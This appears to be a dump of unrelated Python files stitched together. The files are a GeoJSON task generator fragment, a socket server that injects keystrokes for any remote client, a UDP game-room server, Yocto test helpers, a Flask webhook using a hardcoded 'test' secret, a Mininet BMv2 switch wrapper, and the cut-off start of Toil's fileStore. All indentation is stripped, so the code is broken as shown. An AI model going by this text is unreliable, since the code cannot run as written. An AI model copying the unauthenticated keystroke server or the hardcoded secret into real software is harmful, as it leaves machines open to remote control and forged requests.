filtered_data_filename = (
f"{DATA_PATH}/api/yes_maybe/yes_maybe_{project_id}.geojson"
)
tasking_manager_data_filename = (
f"{DATA_PATH}/api/hot_tm/hot_tm_{project_id}.geojson"
)
# load project data from existing files
results = load_data(project_id, raw_data_filename)
# filter yes and maybe results
filtered_results = filter_data(results)
if len(filtered_results) > 0:
# dissolve filtered results
dissolved_filtered_results = dissolve_project_data(filtered_results)
# create tasking manager geometries
tasking_manager_results = create_hot_tm_tasks(project_id, filtered_results)
# save data as geojson
geojson_functions.create_geojson_file(
dissolved_filtered_results, filtered_data_filename
)
geojson_functions.create_geojson_file_from_dict(
tasking_manager_results, tasking_manager_data_filename
)
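# Typical invocation sketch ("example_project" is a placeholder id): calling
#   generate_tasking_manager_geometries("example_project")
# reads {DATA_PATH}/api/agg_results/agg_results_example_project.csv and writes
# the yes_maybe and hot_tm GeoJSON files into the corresponding api folders.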
|
server.py
|
import socket, threading
import keyboard
users = 0
def user(conn, n):
global users
myid = users
print("New user: " + str(myid))
users += 1
while True:
data = conn.recv(128)
if not data:
break
s = data.decode().split(';') # UP/DOWN;keycode
print(s[0] + ' by ' + s[1])
if s[0] == 'DOWN':
keyboard.press(s[1])
if s[0] == 'UP':
keyboard.release(s[1])
print("User disconnect: " + str(myid))
users -= 1
myaddr = socket.gethostbyname_ex(socket.gethostname())[-1]
print(str(myaddr))
sock = socket.socket()
sock.bind(('', 9090))
sock.listen(10)
while True:
conn, addr = sock.accept()
threading.Thread(target=user, args=(conn, 0)).start()
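# Minimal client sketch (assumes the "UP/DOWN;keycode" protocol handled above;
# not part of the original file):
#   import socket
#   c = socket.socket()
#   c.connect(("127.0.0.1", 9090))
#   c.send("DOWN;a".encode())  # press the 'a' key on the server machine
#   c.send("UP;a".encode())    # release it again
#   c.close()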
|
udp_main.py
|
import socketserver
import threading
import os
import random
import time
# import binascii
from . import aes
from .udp_parser import CommandParser
from .udp_class import Room, Player, bi
from .udp_config import Config
# token: {'key': key, 'room': Room, 'player_index': player_index, 'player_id': player_id}
link_play_data = {}
room_id_dict = {} # 'room_id': Room
room_code_dict = {} # 'room_code': Room
player_dict = {} # 'player_id' : Player
clean_timer = 0
def random_room_code():
# generate a random room code
re = ''
for _ in range(4):
re += chr(random.randint(65, 90))
for _ in range(2):
re += str(random.randint(0, 9))
return re
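# Example output (illustrative only): "KQZT07", i.e. four random uppercase
# letters followed by two random digits.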
def clear_player(token):
# remove the player's info and token
del player_dict[link_play_data[token]['player_id']]
del link_play_data[token]
def clear_room(room):
# remove the room's info
room_id = room.room_id
room_code = room.room_code
del room_id_dict[room_id]
del room_code_dict[room_code]
del room
def memory_clean(now):
# memory cleanup: drop rooms and players past the time limit
clean_room_list = []
clean_player_list = []
for token in link_play_data:
room = link_play_data[token]['room']
if now - room.timestamp >= Config.TIME_LIMIT:
clean_room_list.append(room.room_id)
if now - room.players[link_play_data[token]['player_index']].last_timestamp // 1000 >= Config.TIME_LIMIT:
clean_player_list.append(token)
for room_id in room_id_dict:
if now - room_id_dict[room_id].timestamp >= Config.TIME_LIMIT:
clean_room_list.append(room_id)
for room_id in clean_room_list:
if room_id in room_id_dict:
clear_room(room_id_dict[room_id])
for token in clean_player_list:
clear_player(token)
class UDPhandler(socketserver.BaseRequestHandler):
def handle(self):
client_msg, server = self.request
token = client_msg[:8]
iv = client_msg[8:20]
tag = client_msg[20:32]
ciphertext = client_msg[32:]
if int.from_bytes(token, byteorder='little') in link_play_data:
user = link_play_data[bi(token)]
else:
return None
plaintext = aes.decrypt(user['key'], b'', iv, ciphertext, tag)
# print(binascii.b2a_hex(plaintext))
commands = CommandParser(
user['room'], user['player_index']).get_commands(plaintext)
if user['room'].players[user['player_index']].player_id == 0:
clear_player(bi(token))
temp = []
for i in commands:
if i[:3] == b'\x06\x16\x12':
temp.append(i)
commands = temp
# workaround for players that could not be kicked correctly
for i in commands:
iv, ciphertext, tag = aes.encrypt(user['key'], i, b'')
# print(binascii.b2a_hex(i))
server.sendto(token + iv + tag[:12] +
ciphertext, self.client_address)
def server_run(ip, port):
server = socketserver.ThreadingUDPServer((ip, port), UDPhandler)
server.serve_forever()
def data_swap(conn):
clean_timer = 0
while True:
try:
data = conn.recv()
except EOFError:
break
now = round(time.time() * 1000)
if now - clean_timer >= Config.TIME_LIMIT:
clean_timer = now
memory_clean(now)
if data[0] == 1:
# create a room
key = os.urandom(16)
room_id = bi(os.urandom(8))
while room_id in room_id_dict or room_id == 0:  # ensure the room id is unique and non-zero
room_id = bi(os.urandom(8))
room = Room()
room.room_id = room_id
room_id_dict[room_id] = room
player_id = bi(os.urandom(3))
while player_id in player_dict or player_id == 0:  # ensure the player id is unique and non-zero
player_id = bi(os.urandom(3))
player = Player()
player.player_id = player_id
player.set_player_name(data[1])
player_dict[player_id] = player
player.song_unlock = data[2]
room.song_unlock = data[2]
room.host_id = player_id
room.players[0] = player
room.player_num = 1
room_code = random_room_code()
while room_code in room_code_dict:
room_code = random_room_code()
room.room_code = room_code
room_code_dict[room_code] = room
token = room_id
player.token = token
link_play_data[token] = {'key': key,
'room': room,
'player_index': 0,
'player_id': player_id}
conn.send((0, room_code, room_id, token, key, player_id))
elif data[0] == 2:
room_code = data[3].upper()
if room_code not in room_code_dict:
# wrong room code
conn.send((1202, ))
else:
room = room_code_dict[room_code]
if room.player_num == 4:
# room is full
conn.send((1201, ))
elif room.state != 2:
# room cannot be joined right now
conn.send((1205, ))
else:
key = os.urandom(16)
token = bi(os.urandom(8))
player_id = bi(os.urandom(3))
while player_id in player_dict or player_id == 0:  # ensure the player id is unique and non-zero
player_id = bi(os.urandom(3))
player = Player()
player.player_id = player_id
player.set_player_name(data[1])
player.token = token
player_dict[player_id] = player
player.song_unlock = data[2]
room.update_song_unlock()
for i in range(4):
if room.players[i].player_id == 0:
room.players[i] = player
player_index = i
break
link_play_data[token] = {'key': key,
'room': room,
'player_index': player_index,
'player_id': player_id}
conn.send((0, room_code, room.room_id,
token, key, player_id, room.song_unlock))
elif data[0] == 3:
token = data[1]
if token in link_play_data:
r = link_play_data[token]
conn.send((0, r['room'].room_code, r['room'].room_id, r['key'],
r['room'].players[r['player_index']].player_id, r['room'].song_unlock))
else:
conn.send((108, ))
def link_play(conn, ip: str, port: int):
try:
server = threading.Thread(target=server_run, args=(ip, port))
data_exchange = threading.Thread(target=data_swap, args=(conn,))
server.start()
data_exchange.start()
except:
pass
|
commands.py
|
# Copyright (c) 2013-2014 Intel Corporation
#
# Released under the MIT license (see COPYING.MIT)
# DESCRIPTION
# This module is mainly used by scripts/oe-selftest and modules under meta/oeqa/selftest
# It provides a class and methods for running commands on the host in a convenient way for tests.
import os
import sys
import signal
import subprocess
import threading
import logging
from oeqa.utils import CommandError
from oeqa.utils import ftools
import re
import contextlib
# Export test doesn't require bb
try:
import bb
except ImportError:
pass
class Command(object):
def __init__(self, command, bg=False, timeout=None, data=None, **options):
self.defaultopts = {
"stdout": subprocess.PIPE,
"stderr": subprocess.STDOUT,
"stdin": None,
"shell": False,
"bufsize": -1,
}
self.cmd = command
self.bg = bg
self.timeout = timeout
self.data = data
self.options = dict(self.defaultopts)
if isinstance(self.cmd, basestring):
self.options["shell"] = True
if self.data:
self.options['stdin'] = subprocess.PIPE
self.options.update(options)
self.status = None
self.output = None
self.error = None
self.thread = None
self.log = logging.getLogger("utils.commands")
def run(self):
self.process = subprocess.Popen(self.cmd, **self.options)
def commThread():
self.output, self.error = self.process.communicate(self.data)
self.thread = threading.Thread(target=commThread)
self.thread.start()
self.log.debug("Running command '%s'" % self.cmd)
if not self.bg:
self.thread.join(self.timeout)
self.stop()
def stop(self):
if self.thread.isAlive():
self.process.terminate()
# let's give it more time to terminate gracefully before killing it
self.thread.join(5)
if self.thread.isAlive():
self.process.kill()
self.thread.join()
self.output = self.output.rstrip()
self.status = self.process.poll()
self.log.debug("Command '%s' returned %d as exit code." % (self.cmd, self.status))
# logging the complete output is insane
# bitbake -e output is really big
# and makes the log file useless
if self.status:
lout = "\n".join(self.output.splitlines()[-20:])
self.log.debug("Last 20 lines:\n%s" % lout)
class Result(object):
pass
def runCmd(command, ignore_status=False, timeout=None, assert_error=True, **options):
result = Result()
cmd = Command(command, timeout=timeout, **options)
cmd.run()
result.command = command
result.status = cmd.status
result.output = cmd.output
result.pid = cmd.process.pid
if result.status and not ignore_status:
if assert_error:
raise AssertionError("Command '%s' returned non-zero exit status %d:\n%s" % (command, result.status, result.output))
else:
raise CommandError(result.status, command, result.output)
return result
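# Usage sketch (assumed invocation, matching the signature above):
#   result = runCmd("uname -r")                    # result.status, result.output, result.pid
#   result = runCmd("false", ignore_status=True)   # non-zero exit is tolerated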
def bitbake(command, ignore_status=False, timeout=None, postconfig=None, **options):
if postconfig:
postconfig_file = os.path.join(os.environ.get('BUILDDIR'), 'oeqa-post.conf')
ftools.write_file(postconfig_file, postconfig)
extra_args = "-R %s" % postconfig_file
else:
extra_args = ""
if isinstance(command, basestring):
cmd = "bitbake " + extra_args + " " + command
else:
cmd = [ "bitbake" ] + [a for a in (command + extra_args.split(" ")) if a not in [""]]
try:
return runCmd(cmd, ignore_status, timeout, **options)
finally:
if postconfig:
os.remove(postconfig_file)
def get_bb_env(target=None, postconfig=None):
if target:
return bitbake("-e %s" % target, postconfig=postconfig).output
else:
return bitbake("-e", postconfig=postconfig).output
def get_bb_var(var, target=None, postconfig=None):
val = None
bbenv = get_bb_env(target, postconfig=postconfig)
lastline = None
for line in bbenv.splitlines():
if re.search("^(export )?%s=" % var, line):
val = line.split('=', 1)[1]
val = val.strip('\"')
break
elif re.match("unset %s$" % var, line):
# Handle [unexport] variables
if lastline.startswith('# "'):
val = lastline.split('\"')[1]
break
lastline = line
return val
def get_test_layer():
layers = get_bb_var("BBLAYERS").split()
testlayer = None
for l in layers:
if '~' in l:
l = os.path.expanduser(l)
if "/meta-selftest" in l and os.path.isdir(l):
testlayer = l
break
return testlayer
def create_temp_layer(templayerdir, templayername, priority=999, recipepathspec='recipes-*/*'):
os.makedirs(os.path.join(templayerdir, 'conf'))
with open(os.path.join(templayerdir, 'conf', 'layer.conf'), 'w') as f:
f.write('BBPATH .= ":${LAYERDIR}"\n')
f.write('BBFILES += "${LAYERDIR}/%s/*.bb \\' % recipepathspec)
f.write(' ${LAYERDIR}/%s/*.bbappend"\n' % recipepathspec)
f.write('BBFILE_COLLECTIONS += "%s"\n' % templayername)
f.write('BBFILE_PATTERN_%s = "^${LAYERDIR}/"\n' % templayername)
f.write('BBFILE_PRIORITY_%s = "%d"\n' % (templayername, priority))
f.write('BBFILE_PATTERN_IGNORE_EMPTY_%s = "1"\n' % templayername)
@contextlib.contextmanager
def runqemu(pn, ssh=True):
import bb.tinfoil
import bb.build
tinfoil = bb.tinfoil.Tinfoil()
tinfoil.prepare(False)
try:
tinfoil.logger.setLevel(logging.WARNING)
import oeqa.targetcontrol
tinfoil.config_data.setVar("TEST_LOG_DIR", "${WORKDIR}/testimage")
tinfoil.config_data.setVar("TEST_QEMUBOOT_TIMEOUT", "1000")
import oe.recipeutils
recipefile = oe.recipeutils.pn_to_recipe(tinfoil.cooker, pn)
recipedata = oe.recipeutils.parse_recipe(recipefile, [], tinfoil.config_data)
# The QemuRunner log is saved out, but we need to ensure it is at the right
# log level (and then ensure that since it's a child of the BitBake logger,
# we disable propagation so we don't then see the log events on the console)
logger = logging.getLogger('BitBake.QemuRunner')
logger.setLevel(logging.DEBUG)
logger.propagate = False
logdir = recipedata.getVar("TEST_LOG_DIR", True)
qemu = oeqa.targetcontrol.QemuTarget(recipedata)
finally:
# We need to shut down tinfoil early here in case we actually want
# to run tinfoil-using utilities with the running QEMU instance.
# Luckily QemuTarget doesn't need it after the constructor.
tinfoil.shutdown()
# Setup bitbake logger as console handler is removed by tinfoil.shutdown
bblogger = logging.getLogger('BitBake')
bblogger.setLevel(logging.INFO)
console = logging.StreamHandler(sys.stdout)
bbformat = bb.msg.BBLogFormatter("%(levelname)s: %(message)s")
if sys.stdout.isatty():
bbformat.enable_color()
console.setFormatter(bbformat)
bblogger.addHandler(console)
try:
qemu.deploy()
try:
qemu.start(ssh=ssh)
except bb.build.FuncFailed:
raise Exception('Failed to start QEMU - see the logs in %s' % logdir)
yield qemu
finally:
try:
qemu.stop()
except:
pass
|
app.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @author : microfat
# @time : 09/27/20 14:03:09
# @File : app.py
import hashlib
import threading
import json
from pygments import highlight, lexers, formatters
from flask import Flask, request
app = Flask(__name__)
class Handle:
def __init__(self):
pass
def handle(self, payload):
if payload['op'] == 'data_create':
colorful_json = self._colorful_json(payload)
print(colorful_json)
if payload['op'] == 'data_update':
colorful_json = self._colorful_json(payload)
print(colorful_json)
if payload['op'] == 'data_remove':
colorful_json = self._colorful_json(payload)
print(colorful_json)
if payload['op'] == 'data_recover':
colorful_json = self._colorful_json(payload)
print(colorful_json)
if payload['op'] == 'form_update':
colorful_json = self._colorful_json(payload)
print(colorful_json)
if payload['op'] == 'data_test':
print('data_test')
def _colorful_json(self, payload):
formatted_json = json.dumps(payload, indent=4, ensure_ascii=False, sort_keys=True)
colorful_json = highlight(formatted_json, lexers.JsonLexer(), formatters.TerminalFormatter())
return colorful_json
def get_signature(self, nonce, payload, secret, timestamp):
content = ':'.join([nonce, payload, secret, timestamp]).encode('utf-8')
m = hashlib.sha1()
m.update(content)
#print(content, m.hexdigest())
return m.hexdigest()
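# Signature sketch (hypothetical values; mirrors get_signature above): the
# request is accepted when the x-jdy-signature header equals
# hashlib.sha1(":".join([nonce, payload, secret, timestamp]).encode("utf-8")).hexdigest(),
# e.g. get_signature("abc", '{"op": "data_test"}', "test", "1601190189").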
@app.route('/', methods=['POST'])
def callback():
handle = Handle()
payload = request.data.decode('utf-8')
#print(payload)
nonce = request.args['nonce']
timestamp = request.args['timestamp']
print('\n' + '\x1b[94m' + str(request.headers) + '\x1b[39;49;00m', end='')
if request.headers['x-jdy-signature'] != handle.get_signature(nonce, payload, 'test', timestamp):
return 'fail', 401
threading.Thread(target=handle.handle, args=(json.loads(payload), )).start()
return 'success'
|
bmv2.py
|
# coding=utf-8
"""
Copyright 2019-present Open Networking Foundation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import multiprocessing
import os
import random
import re
import socket
import sys
import threading
import time
import urllib2
from contextlib import closing
from mininet.log import info, warn, debug
from mininet.node import Switch, Host
SIMPLE_SWITCH_GRPC = 'simple_switch_grpc'
PKT_BYTES_TO_DUMP = 80
VALGRIND_PREFIX = 'valgrind --leak-check=yes'
SWITCH_START_TIMEOUT = 10 # seconds
BMV2_LOG_LINES = 5
BMV2_DEFAULT_DEVICE_ID = 1
DEFAULT_PIPECONF = "org.onosproject.pipelines.basic"
# Stratum paths relative to stratum repo root
STRATUM_BMV2 = 'stratum_bmv2'
STRATUM_BINARY = '/bazel-bin/stratum/hal/bin/bmv2/' + STRATUM_BMV2
STRATUM_INIT_PIPELINE = '/stratum/hal/bin/bmv2/dummy.json'
def getStratumRoot():
if 'STRATUM_ROOT' not in os.environ:
raise Exception("Env variable STRATUM_ROOT not set")
return os.environ['STRATUM_ROOT']
def parseBoolean(value):
if value in ['1', 1, 'true', 'True']:
return True
else:
return False
def pickUnusedPort():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 0))
addr, port = s.getsockname()
s.close()
return port
def writeToFile(path, value):
with open(path, "w") as f:
f.write(str(value))
def watchDog(sw):
try:
writeToFile(sw.keepaliveFile,
"Remove this file to terminate %s" % sw.name)
while True:
if ONOSBmv2Switch.mininet_exception == 1 \
or not os.path.isfile(sw.keepaliveFile):
sw.killBmv2(log=False)
return
if sw.stopped:
return
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
port = sw.grpcPortInternal if sw.grpcPortInternal else sw.grpcPort
if s.connect_ex(('localhost', port)) == 0:
time.sleep(1)
else:
warn("\n*** WARN: switch %s died ☠️ \n" % sw.name)
sw.printBmv2Log()
print ("-" * 80) + "\n"
return
except Exception as e:
warn("*** ERROR: " + e.message)
sw.killBmv2(log=True)
class ONOSHost(Host):
def __init__(self, name, inNamespace=True, **params):
Host.__init__(self, name, inNamespace=inNamespace, **params)
def config(self, **params):
r = super(Host, self).config(**params)
for off in ["rx", "tx", "sg"]:
cmd = "/sbin/ethtool --offload %s %s off" \
% (self.defaultIntf(), off)
self.cmd(cmd)
# disable IPv6
self.cmd("sysctl -w net.ipv6.conf.all.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.default.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.lo.disable_ipv6=1")
return r
class ONOSBmv2Switch(Switch):
"""BMv2 software switch with gRPC server"""
# Shared value used to notify to all instances of this class that a Mininet
# exception occurred. Mininet exception handling doesn't call the stop()
# method, so the mn process would hang after clean-up since Bmv2 would still
# be running.
mininet_exception = multiprocessing.Value('i', 0)
def __init__(self, name, json=None, debugger=False, loglevel="warn",
elogger=False, grpcport=None, cpuport=255, notifications=False,
thriftport=None, netcfg=True, dryrun=False,
pipeconf=DEFAULT_PIPECONF, pktdump=False, valgrind=False,
gnmi=False, portcfg=True, onosdevid=None, stratum=False,
**kwargs):
Switch.__init__(self, name, **kwargs)
self.grpcPort = grpcport
self.grpcPortInternal = None # Needed for Stratum (local_hercules_url)
self.thriftPort = thriftport
self.cpuPort = cpuport
self.json = json
self.useStratum = parseBoolean(stratum)
self.debugger = parseBoolean(debugger)
self.notifications = parseBoolean(notifications)
self.loglevel = loglevel
# Important: Mininet removes all /tmp/*.log files in case of exceptions.
# We want to be able to see the bmv2 log if anything goes wrong, hence
# avoid the .log extension.
self.logfile = '/tmp/bmv2-%s-log' % self.name
self.elogger = parseBoolean(elogger)
self.pktdump = parseBoolean(pktdump)
self.netcfg = parseBoolean(netcfg)
self.dryrun = parseBoolean(dryrun)
self.valgrind = parseBoolean(valgrind)
self.netcfgfile = '/tmp/bmv2-%s-netcfg.json' % self.name
self.chassisConfigFile = '/tmp/bmv2-%s-chassis-config.txt' % self.name
self.pipeconfId = pipeconf
self.injectPorts = parseBoolean(portcfg)
self.withGnmi = parseBoolean(gnmi)
self.longitude = kwargs['longitude'] if 'longitude' in kwargs else None
self.latitude = kwargs['latitude'] if 'latitude' in kwargs else None
if onosdevid is not None and len(onosdevid) > 0:
self.onosDeviceId = onosdevid
else:
self.onosDeviceId = "device:bmv2:%s" % self.name
self.p4DeviceId = BMV2_DEFAULT_DEVICE_ID
self.logfd = None
self.bmv2popen = None
self.stopped = True
# In case of exceptions, mininet removes *.out files from /tmp. We use
# this as a signal to terminate the switch instance (if active).
self.keepaliveFile = '/tmp/bmv2-%s-watchdog.out' % self.name
self.targetName = STRATUM_BMV2 if self.useStratum else SIMPLE_SWITCH_GRPC
# Remove files from previous executions
self.cleanupTmpFiles()
def getSourceIp(self, dstIP):
"""
Queries the Linux routing table to get the source IP that can talk with
dstIP, and vice versa.
"""
ipRouteOut = self.cmd('ip route get %s' % dstIP)
r = re.search(r"src (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})", ipRouteOut)
return r.group(1) if r else None
def getDeviceConfig(self, srcIP):
basicCfg = {
"managementAddress": "grpc://%s:%d?device_id=%d" % (
srcIP, self.grpcPort, self.p4DeviceId),
"driver": "stratum-bmv2" if self.useStratum else "bmv2",
"pipeconf": self.pipeconfId
}
if self.longitude and self.latitude:
basicCfg["longitude"] = self.longitude
basicCfg["latitude"] = self.latitude
cfgData = {
"basic": basicCfg
}
if not self.useStratum and self.injectPorts:
portData = {}
portId = 1
for intfName in self.intfNames():
if intfName == 'lo':
continue
portData[str(portId)] = {
"number": portId,
"name": intfName,
"enabled": True,
"removed": False,
"type": "copper",
"speed": 10000
}
portId += 1
cfgData['ports'] = portData
return cfgData
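# Example of the netcfg fragment produced above (values are illustrative):
#   {
#     "basic": {
#       "managementAddress": "grpc://192.168.0.1:50001?device_id=1",
#       "driver": "bmv2",
#       "pipeconf": "org.onosproject.pipelines.basic"
#     },
#     "ports": {
#       "1": {"number": 1, "name": "s1-eth1", "enabled": True,
#             "removed": False, "type": "copper", "speed": 10000}
#     }
#   }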
def chassisConfig(self):
config = """description: "BMv2 simple_switch {name}"
chassis {{
platform: PLT_P4_SOFT_SWITCH
name: "{name}"
}}
nodes {{
id: {nodeId}
name: "{name} node {nodeId}"
slot: 1
index: 1
}}\n""".format(name=self.name, nodeId=self.p4DeviceId)
intfNumber = 1
for intfName in self.intfNames():
if intfName == 'lo':
continue
config = config + """singleton_ports {{
id: {intfNumber}
name: "{intfName}"
slot: 1
port: {intfNumber}
channel: 1
speed_bps: 10000000000
config_params {{
admin_state: ADMIN_STATE_ENABLED
}}
node: {nodeId}
}}\n""".format(intfName=intfName, intfNumber=intfNumber,
nodeId=self.p4DeviceId)
intfNumber += 1
return config
def doOnosNetcfg(self, controllerIP):
"""
Notifies ONOS about the new device via Netcfg.
"""
srcIP = self.getSourceIp(controllerIP)
if not srcIP:
warn("*** WARN: unable to get switch IP address, won't do netcfg\n")
return
cfgData = {
"devices": {
self.onosDeviceId: self.getDeviceConfig(srcIP)
}
}
with open(self.netcfgfile, 'w') as fp:
json.dump(cfgData, fp, indent=4)
if not self.netcfg:
# Do not push config to ONOS.
print ""
return
# Build netcfg URL
url = 'http://%s:8181/onos/v1/network/configuration/' % controllerIP
# Instantiate password manager for HTTP auth
pm = urllib2.HTTPPasswordMgrWithDefaultRealm()
pm.add_password(None, url,
os.environ['ONOS_WEB_USER'],
os.environ['ONOS_WEB_PASS'])
urllib2.install_opener(urllib2.build_opener(
urllib2.HTTPBasicAuthHandler(pm)))
# Push config data to controller
req = urllib2.Request(url, json.dumps(cfgData),
{'Content-Type': 'application/json'})
try:
f = urllib2.urlopen(req)
print f.read()
f.close()
except urllib2.URLError as e:
warn("*** WARN: unable to push config to ONOS (%s)\n" % e.reason)
def start(self, controllers):
if not self.stopped:
warn("*** %s is already running!\n" % self.name)
return
# Remove files from previous executions (if we are restarting)
self.cleanupTmpFiles()
if self.grpcPort is None:
self.grpcPort = pickUnusedPort()
writeToFile("/tmp/bmv2-%s-grpc-port" % self.name, self.grpcPort)
if self.thriftPort is None:
self.thriftPort = pickUnusedPort()
writeToFile("/tmp/bmv2-%s-thrift-port" % self.name, self.thriftPort)
if self.useStratum:
config_dir = "/tmp/bmv2-%s-stratum" % self.name
os.mkdir(config_dir)
with open(self.chassisConfigFile, 'w') as fp:
fp.write(self.chassisConfig())
if self.grpcPortInternal is None:
self.grpcPortInternal = pickUnusedPort()
cmdString = self.getStratumCmdString(config_dir)
else:
cmdString = self.getBmv2CmdString()
if self.dryrun:
info("\n*** DRY RUN (not executing %s)\n" % self.targetName)
debug("\n%s\n" % cmdString)
try:
if not self.dryrun:
# Start the switch
self.stopped = False
self.logfd = open(self.logfile, "w")
self.logfd.write(cmdString + "\n\n" + "-" * 80 + "\n\n")
self.logfd.flush()
self.bmv2popen = self.popen(cmdString,
stdout=self.logfd,
stderr=self.logfd)
self.waitBmv2Start()
# We want to be notified if BMv2/Stratum dies...
threading.Thread(target=watchDog, args=[self]).start()
self.doOnosNetcfg(self.controllerIp(controllers))
except Exception:
ONOSBmv2Switch.mininet_exception = 1
self.killBmv2()
self.printBmv2Log()
raise
def getBmv2CmdString(self):
bmv2Args = [SIMPLE_SWITCH_GRPC] + self.bmv2Args()
if self.valgrind:
bmv2Args = VALGRIND_PREFIX.split() + bmv2Args
return " ".join(bmv2Args)
def getStratumCmdString(self, config_dir):
stratumRoot = getStratumRoot()
args = [
stratumRoot + STRATUM_BINARY,
'-device_id=%d' % self.p4DeviceId,
'-chassis_config_file=%s' % self.chassisConfigFile,
'-forwarding_pipeline_configs_file=/dev/null',
'-persistent_config_dir=' + config_dir,
'-initial_pipeline=' + stratumRoot + STRATUM_INIT_PIPELINE,
'-cpu_port=%s' % self.cpuPort,
'-external_hercules_urls=0.0.0.0:%d' % self.grpcPort,
'-local_hercules_url=localhost:%d' % self.grpcPortInternal,
'-bmv2_thrift_port=%d' % self.thriftPort,
'-bmv2_log_level=%s' % self.loglevel,
'-max_num_controllers_per_node=10',
'-write_req_log_file=/dev/null'
]
return " ".join(args)
def bmv2Args(self):
args = ['--device-id %s' % str(self.p4DeviceId)]
for port, intf in self.intfs.items():
if not intf.IP():
args.append('-i %d@%s' % (port, intf.name))
args.append('--thrift-port %s' % self.thriftPort)
if self.notifications:
ntfaddr = 'ipc:///tmp/bmv2-%s-notifications.ipc' % self.name
args.append('--notifications-addr %s' % ntfaddr)
if self.elogger:
nanologaddr = 'ipc:///tmp/bmv2-%s-nanolog.ipc' % self.name
args.append('--nanolog %s' % nanologaddr)
if self.debugger:
dbgaddr = 'ipc:///tmp/bmv2-%s-debug.ipc' % self.name
args.append('--debugger-addr %s' % dbgaddr)
args.append('--log-console')
if self.pktdump:
args.append('--pcap --dump-packet-data %s' % PKT_BYTES_TO_DUMP)
args.append('-L%s' % self.loglevel)
if not self.json:
args.append('--no-p4')
else:
args.append(self.json)
# gRPC target-specific options
args.append('--')
args.append('--cpu-port %s' % self.cpuPort)
args.append('--grpc-server-addr 0.0.0.0:%s' % self.grpcPort)
return args
def waitBmv2Start(self):
# Wait for switch to open gRPC port, before sending ONOS the netcfg.
# Include time-out just in case something hangs.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
endtime = time.time() + SWITCH_START_TIMEOUT
while True:
port = self.grpcPortInternal if self.grpcPortInternal else self.grpcPort
result = sock.connect_ex(('localhost', port))
if result == 0:
# No new line
sys.stdout.write("⚡️ %s @ %d" % (self.targetName, self.bmv2popen.pid))
sys.stdout.flush()
# The port is open. Let's go! (Close socket first)
sock.close()
break
# Port is not open yet. If there is time, we wait a bit.
if endtime > time.time():
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(0.05)
else:
# Time's up.
raise Exception("Switch did not start before timeout")
def printBmv2Log(self):
if os.path.isfile(self.logfile):
print "-" * 80
print "%s log (from %s):" % (self.name, self.logfile)
with open(self.logfile, 'r') as f:
lines = f.readlines()
if len(lines) > BMV2_LOG_LINES:
print "..."
for line in lines[-BMV2_LOG_LINES:]:
print line.rstrip()
@staticmethod
def controllerIp(controllers):
try:
# onos.py
clist = controllers[0].nodes()
except AttributeError:
clist = controllers
assert len(clist) > 0
return random.choice(clist).IP()
def killBmv2(self, log=False):
self.stopped = True
if self.bmv2popen is not None:
self.bmv2popen.terminate()
self.bmv2popen.wait()
self.bmv2popen = None
if self.logfd is not None:
if log:
self.logfd.write("*** PROCESS TERMINATED BY MININET ***\n")
self.logfd.close()
self.logfd = None
def cleanupTmpFiles(self):
self.cmd("rm -rf /tmp/bmv2-%s-*" % self.name)
def stop(self, deleteIntfs=True):
"""Terminate switch."""
self.killBmv2(log=True)
Switch.stop(self, deleteIntfs)
class ONOSStratumSwitch(ONOSBmv2Switch):
def __init__(self, name, **kwargs):
kwargs["stratum"] = True
super(ONOSStratumSwitch, self).__init__(name, **kwargs)
# Exports for bin/mn
switches = {
'onosbmv2': ONOSBmv2Switch,
'stratum': ONOSStratumSwitch,
}
hosts = {'onoshost': ONOSHost}
|
fileStore.py
|
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from future import standard_library
standard_library.install_aliases()
from builtins import map
from builtins import str
from builtins import range
from builtins import object
from abc import abstractmethod, ABCMeta
from toil.lib.objects import abstractclassmethod
import base64
from collections import namedtuple, defaultdict
import dill
import errno
import logging
import os
import shutil
import stat
import tempfile
import time
import uuid
from contextlib import contextmanager
from fcntl import flock, LOCK_EX, LOCK_UN
from functools import partial
from hashlib import sha1
from threading import Thread, Semaphore, Event
# Python 3 compatibility imports
from six.moves.queue import Empty, Queue
from six.moves import xrange
from toil.lib.humanize import bytes2human
from toil.common import cacheDirName, getDirSizeRecursively, getFileSystemSize
from toil.lib.bioio import makePublicDir
from toil.resource import ModuleDescriptor
from future.utils import with_metaclass
logger = logging.getLogger(__name__)
class DeferredFunction(namedtuple('DeferredFunction', 'function args kwargs name module')):
"""
>>> df = DeferredFunction.create(defaultdict, None, {'x':1}, y=2)
>>> df
DeferredFunction(defaultdict, ...)
>>> df.invoke() == defaultdict(None, x=1, y=2)
True
"""
@classmethod
def create(cls, function, *args, **kwargs):
"""
Capture the given callable and arguments as an instance of this class.
:param callable function: The deferred action to take in the form of a function
:param tuple args: Non-keyword arguments to the function
:param dict kwargs: Keyword arguments to the function
"""
# The general principle is to deserialize as late as possible, i.e. when the function is
# to be invoked, as that will avoid redundantly deserializing deferred functions for
# concurrently running jobs when the cache state is loaded from disk. By implication we
# should serialize as early as possible. We need to serialize the function as well as its
# arguments.
return cls(*list(map(dill.dumps, (function, args, kwargs))),
name=function.__name__,
module=ModuleDescriptor.forModule(function.__module__).globalize())
def invoke(self):
"""
Invoke the captured function with the captured arguments.
"""
logger.debug('Running deferred function %s.', self)
self.module.makeLoadable()
function, args, kwargs = list(map(dill.loads, (self.function, self.args, self.kwargs)))
return function(*args, **kwargs)
def __str__(self):
